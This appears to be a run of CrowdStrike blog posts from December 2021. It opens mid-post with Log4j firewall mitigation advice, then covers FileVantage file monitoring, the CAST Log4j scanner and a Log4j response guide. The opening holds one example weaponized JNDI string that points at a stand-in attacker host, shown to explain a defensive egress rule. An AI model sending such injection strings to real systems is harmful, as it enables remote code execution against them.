Let’s take DNS as an example. An example of a weaponized JNDI string might look like this:

jndi:dns://evilserver.com:1234/payload/path

On an enterprise server, I know exactly where and how DNS requests are made. DNS resolution requests will travel from my application server running Log4j2 (10.100.22.101) to my DNS server (10.100.53.53) via TCP or UDP on port 53. 

Creating a firewall or web application firewall rule that restricts DNS communication to known infrastructure would prevent any JNDI exploitation via DNS unless the adversary had control of my DNS server and could host weaponized payloads there. 

The above JNDI string would fail with an appropriate firewall or WAF rule in place as it is trying to make a DNS connection to evilserver.com on port 1234 — not my DNS server.

If you have firewall and WAF logs aggregate in a centralized location, use your correlator to look for trends and patterns to assist in rule creation. If you’re struggling with log aggregation, you can reach out to your local account team and inquire about Humio.

Conclusion

We hope this blog has been helpful and provides some actionable steps that can be taken to help slow down adversaries as teams continue to patch. Stay vigilant and keep defending. 

Additional Resources

Monitoring File Changes with Falcon FileVantage

22 December 2021 at 18:36

Introduction

Due to compliance regulations, many organizations have a need to monitor key assets for changes made to certain files, folders or registry settings. File Integrity Monitoring (FIM) can be a daunting deployment that requires yet another solution in the security stack. As a cloud delivered platform, CrowdStrike leverages a single light-weight agent to address a number of security challenges including FIM.

Video

Falcon FileVantage

CrowdStrike’s FileVantage module helps organizations meet compliance requirements by comprehensively monitoring file, folder, and registry modifications while also simplifying the security stack. Through the easy to use Falcon interface, FileVantage provides visibility to changes on critical assets that are also prioritized based on the configured severity level. Intuitive dashboards like this help organizations quickly identify and address issues based on severity, category and change type.

filevantage dashboard

Custom Policies and Assignment

The dashboard is populated based on flexible policies and rules. The rule groups themselves are defined in two categories with one focused on files and directories, while the other looks at registry changes.

filevantage rule groups

Within a given rule group, rules can be added, edited, sorted and deleted.

filevantage rule groups

Rules can be created to monitor specific changes along with customization options to prioritize events and reduce alert fatigue. As an example, this rule monitors for any type of change to the Demo directory and identifies those as low severity. However, it excludes any changes to log files. The checkbox options can be used to tune the rule to specific directory and file actions. 

filevantage rule options

Once the rule groups are set up, they can be added to a policy. Those policies are then assigned to designated host groups. With granular, group based assignment, organizations can ensure that the correct file integrity policies are in place for different servers and workloads based on their critical nature and function. 

filevantage policy setup

Managing Changes

Once the policies are defined and applied to host groups, any associated changes will be reported via the same, consolidated Falcon UI. Drilling down on the dashboard provides the supporting details which are also available from the menu under “Changes”. This list of file changes can be filtered using the options at the top. 

filevantage changes

By changing the filters to focus on changes to a specific host and user, the list reveals events related to the custom rule shown above for the demo directory. For each change, there are details including hostname, object and path. 

filevantage changes

Organizations can also leverage Falcon Fusion workflows to set up automated responses to these events. Those responses can include containment, enrichment, and Real Time Response actions as well as notifications like webhooks, ServiceNow incidents and messages via email, Teams or slack. Workflows can be configured as automatic or manual as shown below.

filevantage workflows

Conclusion

Falcon FileVantage is a robust file integrity monitoring solution that offers the streamlined, central visibility that organizations need to satisfy compliance requirements. Security Operations teams can not only identify and prioritize any changes to critical files folders and registries, but they can also leverage automated responses and notifications based on the nature of those changes.

More resources

CrowdStrike Launches Free Targeted Log4j Search Tool

22 December 2021 at 12:28

The recently discovered Log4j vulnerability has serious potential to expose organizations across the globe to a new wave of cybersecurity risks as threat actors look to exploit this latest vulnerability to execute their malicious payloads using remote code execution (RCE).

An immediate challenge that every organization faces is simply trying to understand exactly where you have applications that are using this very popular Java library — but you are not facing this challenge alone.

The CrowdStrike Services team has been busy developing a community tool that can be used to quickly scan file systems looking for versions of the Log4j code libraries to help organizations understand what they need to patch in order to mitigate their risk.

The free CrowdStrike tool (dubbed the CrowdStrike Archive Scan Tool, or “CAST”) performs a targeted search by scanning a given set of directories for JAR, WAR, ZIP and EAR files, and then it performs a deeper scan on those file types matching against a known set of checksums for Log4j libraries. We help organizations find any version of the affected Log4j library anywhere on disk, even if it is deeply nested in multiple levels of archive files.

CAST searches for approximately 6,500 SHA256 checksums unique to the known vulnerable releases. It will walk the files or directories scanning inside of ZIP-format archives to find every instance of these. As we developed the tool, we carefully considered the following:

  • Be mindful of the resource consumption when running a scan to minimize the impact on end-user systems.
  • Intentionally allow a higher number of false-positive results, leaving the decision in the hands of the system owners whether a given result warrants further investigation. 
    • We may see higher false positives because we identify any trace of vulnerable versions of Log4j, even if the vulnerability has been addressed by removing one or more classes from the deployment.
  • The results should be extremely reliable, as they’re based on cryptographic checksums.
  • Allow use of the tool with pre-indexed (e.g., “locate”) file systems to avoid scanning and  simply pass the paths to known files on the command line. 
    • For example, locate -0 *.jar | xargs -0 ./cast
  • Provide the ability to tune memory usage — for example: 
    • -recursion 0 to disable scanning sub-archives 
    • -recursion 1 to scan only 1 sub-archive deep  
    • -maxmem 1000000 to limit sub-archive scanning to 1MB (compressed)

The tool is intentionally single-threaded as we have to be conscious of resource consumption and allow users or administrators to manage their own resources. One thread will (in our experience) scan a file system quickly enough. One could scan multiple directories simultaneously by executing multiple copies of the tool, but the file system load would likely cause a noticeable user impact.

Staying true to CrowdStrike’s cross-platform focus, we developed CAST as a tool that will run on Windows, Mac and Linux systems, and we are using the tool in CrowdStrike Services engagements to assist our clients who need support to find Log4j instances. 

The tool is easily deployed by simply downloading the binary to your disk and then executing the binary with the directories or files you want to scan.

For example: “./cast /opt /srv /path/to/java/application”

CrowdStrike Falcon® customers also have the option to deploy and run the tool using the Falcon Real Time Response (RTR) capabilities in the Falcon sensor. A companion PowerShell script “Find-VulnerableLog4J” is included with CAST. This script is designed to be executed on Windows systems via RTR and provide actionable information to systems administrators and incident responders.

Our incident responders know that forensic triage is a continual process of casting increasingly fine nets, and identifying systems that warrant further investigation. Hence, CAST was designed to be a first-cast tool, narrowing investigative scope to a handful of machines (or paths) with known vulnerabilities.

CAST reports back in the form of a JSON file when it locates vulnerable Log4j libraries. Organizations can use this output to get an understanding of where the Log4j libraries exist across their environment so they can prioritize the systems that need to be patched using the latest security updates released by Apache.

CrowdStrike investigators use our Humio solution to load and analyze the data, but you can use any visualization solution (such as ELK). You can also work through the data with a programming language or JSON query language of your choice — the events are intended to be portable.

And finally, CrowdStrike recommends that you fully document your Log4j patching process to streamline future patch application repeatability. Since the initial discovery of the Log4j vulnerability, Apache has released three security updates (patches) at the time of this blog. Organizations that patched systems early in the process may need to reapply the latest patches, hence the need to fully document the process.

We hope you find the resources and tools in this blog useful as you cast your own net in your quest to identify Log4j vulnerabilities across your environment. We stand together when it comes to defeating adversaries that try to exploit this vulnerability against us. 

One team, one fight!

Additional Resources

CrowdStrike Services Launches Log4j Quick Reference Guide (QRG)

21 December 2021 at 20:12

The Log4j vulnerability burst onto the scene just a few weeks ago, but to many defenders it already feels like a lifetime. It has rapidly become one of the top concerns for security teams in 2021, and seems set to remain so for the foreseeable future. The critical details of this threat evolve almost daily, making it a formidable challenge for defenders to keep tabs on the threat and their organizations’ exposure. The CrowdStrike Services Log4j Quick Reference Guide (QRG) distills down the key insights that security teams need to respond effectively.

Experts on the Front Lines 

The experts from CrowdStrike Services stand on the front lines of cybersecurity and have a unique perspective on emerging critical vulnerabilities such as Log4j. The CrowdStrike Incident Response (IR) team takes an intelligence-led, teaming approach that blends real-world IR and remediation experience with cutting-edge technology, leveraging the unique power of the CrowdStrike Security Cloud to identify attackers quickly and disrupt and eject them, and to collect insights to rapidly improve defenses. 

During the course of IR engagements, CrowdStrike’s first responders identify trends, commonalities and common questions that pop up over and over again. Pulling these insights together helps our team to share lessons learned and to communicate more quickly and effectively with clients and their stakeholders, shrinking time-to-respond. 

Introducing the Log4j Quick Reference Guide

We are proud to announce the availability of the CrowdStrike Services Log4j Quick Reference Guide (QRG). CrowdStrike Services Quick Reference Guides (QRGs) are developed based on tightly curated research from open-source reporting and alerts, combined with proprietary insights from the CrowdStrike Services team, gained through dozens of hands-on engagements with real-world intrusions.

The Log4j QRG is broken into several sections:

  • Background: An overview of the trajectory of this historic vulnerability, from the initial announcement to the latest released patches
  • Impact: A summary of the potential impact of an exploit of the Log4j vulnerability, both theoretical and practical
  • Recommendations: A walkthrough of the key steps that CrowdStrike Services recommends organizations take today to mitigate risk from Log4j
  • Testing Best Practices: Tips for safely and accurately identifying vulnerable systems via proof-of-concept payloads that verify when the vulnerability is present

Of course if Log4j has taught us anything, it’s the need to keep abreast of changes in the threat landscape. Just when we think we understand this vulnerability and its impact, we learn something new that resets the clock. We recommend you check back frequently, as CrowdStrike’s responders will keep the Log4j QRG up-to-date as new observations, insights and best practices come to light.

Hear Directly From the Experts

Would you like to learn more? Please join our webcast, Log4j: A View from the Front Lines (1 p.m. EST Dec. 22 and 4 p.m. AEDT Dec. 23), where CrowdStrike’s James Perry, Global IR Sr. Director, and Matt Harvey, U.S. IR Director, will share key observations from their incident response engagements, and how they and their teams are helping organizations to solve some of the key challenges surrounding Log4j. They will share details on the exciting new CrowdStrike Archive Scanning Tool (CAST) — which will be available later this week via the CrowdStrike Log4j Vulnerability Learning Center — that you can use in your own environment to understand your exposure and reduce your risk. 

Additional Resources

❌